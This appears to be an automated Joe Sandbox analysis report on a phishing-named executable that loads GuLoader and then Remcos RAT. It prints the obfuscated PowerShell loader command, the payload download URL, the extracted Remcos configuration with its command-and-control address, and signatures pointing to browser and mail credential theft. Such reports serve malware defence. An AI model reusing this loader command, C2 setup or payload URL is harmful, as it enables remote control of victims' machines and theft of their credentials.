Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Image_Product_Inquiry_Request_Villoslada.exe

Overview

General Information

Sample name:Image_Product_Inquiry_Request_Villoslada.exe
Analysis ID:1552404
MD5:74436e65e2a2612fb6a127990d81f44d
SHA1:d3fb7c67c6441d908a91d6e6b86e38c85b47b877
SHA256:3e6b2955e8e0ddd77f3886b9727ea7a38657d4f0af47130559a8cefe1c87ea97
Tags:exeuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Early bird code injection technique detected
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Image_Product_Inquiry_Request_Villoslada.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe" MD5: 74436E65E2A2612FB6A127990D81F44D)
    • powershell.exe (PID: 7136 cmdline: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Hedgiest165.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Local\Temp\Hedgiest165.exe" MD5: 74436E65E2A2612FB6A127990D81F44D)
        • Hedgiest165.exe (PID: 2232 cmdline: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\fwvclzunqobhontovwjupvveekchrmo" MD5: 74436E65E2A2612FB6A127990D81F44D)
        • Hedgiest165.exe (PID: 6716 cmdline: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\pybvmrepextuythsmgwvzaqvnquqkxftlb" MD5: 74436E65E2A2612FB6A127990D81F44D)
        • Hedgiest165.exe (PID: 3788 cmdline: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe /stext "C:\Users\user\AppData\Local\Temp\zsggmk" MD5: 74436E65E2A2612FB6A127990D81F44D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["185.150.191.117:4609:1"], "Assigned name": "eda bro", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CK59IO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.2574553640.000000000B266000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Hedgiest165.exe PID: 2472JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Process Memory Space: Hedgiest165.exe PID: 2472JoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)" , CommandLine: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe", ParentImage: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe, ParentProcessId: 2504, ParentProcessName: Image_Product_Inquiry_Request_Villoslada.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Rodfstets=Get-Content -Raw 'C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Computergrej.Alu';$Radiotelegrammets=$Rodfstets.SubString(22603,3);.$Radiotelegrammets($Rodfstets)" , ProcessId: 7136, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 31 C1 F4 0B 39 F3 94 CD 1E C3 52 6D E7 94 22 E6 0A 1D 93 6F 10 19 A4 E2 8A 08 8F 72 2A F4 35 02 6A FB D5 45 74 2D 31 F1 AD 94 BA 89 15 4C EA BA A9 6E E2 53 08 0B 9B B1 66 CD 49 BB 99 4C 73 69 FF FF 87 68 BD 1C 87 4F 47 6D 40 A7 17 5C 79 47 B6 A1 E2 08 BF 80 38 6B E4 44 1F E5 D8 FB C7 FE F3 C3 B0 77 01 B8 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Hedgiest165.exe, ProcessId: 2472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-CK59IO\exepath
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-08T18:10:14.065739+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549704TCP
            2024-11-08T18:10:54.116876+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549910TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-08T18:11:07.615091+010020365941Malware Command and Control Activity Detected192.168.2.549979185.150.191.1174609TCP
            2024-11-08T18:11:08.662356+010020365941Malware Command and Control Activity Detected192.168.2.549981185.150.191.1174609TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-08T18:11:08.806124+010028033043Unknown Traffic192.168.2.549980178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-08T18:11:02.086657+010028032702Potentially Bad Traffic192.168.2.549950103.72.57.12080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://103.72.57.120/TGIF/tspPz136.binAvira URL Cloud: Label: malware
            Source: http://103.72.57.120/TGIF/tspPz136.bin=9Avira URL Cloud: Label: malware
            Source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.150.191.117:4609:1"], "Assigned name": "eda bro", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CK59IO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Hedgiest165.exe PID: 2472, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,7_2_00404423
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ent.Automation.pdb source: powershell.exe, 00000002.00000002.2561838270.0000000007846000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00402902 FindFirstFileW,6_2_00402902
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00406739 FindFirstFileW,FindClose,6_2_00406739
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405AED
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_221C10F1
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49979 -> 185.150.191.117:4609
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49981 -> 185.150.191.117:4609
            Source: Malware configuration extractorIPs: 185.150.191.117
            Source: global trafficTCP traffic: 192.168.2.5:49979 -> 185.150.191.117:4609
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 185.150.191.117 185.150.191.117
            Source: Joe Sandbox ViewIP Address: 103.72.57.120 103.72.57.120
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49950 -> 103.72.57.120:80
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49980 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49704
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49910
            Source: global trafficHTTP traffic detected: GET /TGIF/tspPz136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 103.72.57.120Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: unknownTCP traffic detected without corresponding DNS query: 103.72.57.120
            Source: global trafficHTTP traffic detected: GET /TGIF/tspPz136.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 103.72.57.120Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Hedgiest165.exe, 00000007.00000003.2793605160.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
            Source: Hedgiest165.exe, 00000007.00000003.2793605160.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
            Source: Hedgiest165.exe, 00000006.00000002.3298938177.0000000022190000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Hedgiest165.exe, 00000007.00000002.2794092236.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
            Source: Hedgiest165.exe, 00000007.00000002.2794092236.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: `:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Hedgiest165.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: Hedgiest165.exe, 00000006.00000002.3298674234.0000000021C30000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Hedgiest165.exe, 00000006.00000002.3298674234.0000000021C30000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C18000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000002.3288642486.0000000006170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://103.72.57.120/TGIF/tspPz136.bin
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.72.57.120/TGIF/tspPz136.bin=9
            Source: bhv7533.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv7533.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv7533.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv7533.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv7533.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C18000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000003.2776883281.0000000005C8D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000003.2777984739.0000000005C8E000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C69000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000006.00000003.2771149599.0000000005C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphyq
            Source: Image_Product_Inquiry_Request_Villoslada.exe, Hedgiest165.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhv7533.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2557797233.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: Hedgiest165.exe, Hedgiest165.exe, 00000009.00000003.2780926316.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000003.2781111296.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: Hedgiest165.exe, 00000009.00000003.2780926316.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000003.2781111296.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: Hedgiest165.exe, 00000006.00000002.3298938177.0000000022190000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: Hedgiest165.exe, 00000006.00000002.3298938177.0000000022190000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: Hedgiest165.exe, 00000007.00000002.2793761836.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2557797233.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
